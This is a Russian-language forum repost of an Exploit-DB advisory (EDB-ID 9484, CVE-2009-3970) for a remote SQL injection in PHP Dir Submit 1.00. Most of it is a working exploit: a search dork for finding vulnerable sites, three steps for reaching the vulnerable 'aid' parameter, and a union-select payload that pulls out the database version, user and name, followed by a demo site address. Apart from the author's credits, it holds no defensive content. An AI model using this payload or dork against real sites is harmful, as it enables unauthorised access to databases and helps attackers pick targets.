Exploit PHP Dir Submit - 'aid' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
9484
Проверка EDB
  1. Пройдено
Автор
MR.TRO0OQY
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-3970
Дата публикации
2009-08-24
Код:
======================================================================
[»] Script : PHP Dir Submit Version 1.00 (aid) Remote SQL Injection Vuln

[»] Language : php

[»] Dork : Powered by PHP Dir Submit - Directory Submission Script  

[»] Script site : http://www.phpdirsubmit.com

[»] Founder: Mr.tro0oqy <- from Yemen

[»] Gr44tz to: [H]-> borken heart :(

[»] E-mail : [email protected]
======================================================================
exploit:
--------
u must be registered in site

step1:
go to : 
-------
www.xxx.com/path/index.php?menu=signup
-------
step2:
after that : 
-------
add post from here

www.xxx.com/index.php?menu=articles
-------
step3:
press on "View Article" 
and start to inject


http://www.xxx.com/path/index.php?menu=showarticle&aid=3+and+1=0/**/union/**/select/**/1,version(),3,4,user(),database(),7,8,9,10,11--

--------
demo:
--------
http://demo.phpdirsubmit.com
--------

# milw0rm.com [2009-08-24]
 
Источник
www.exploit-db.com

Похожие темы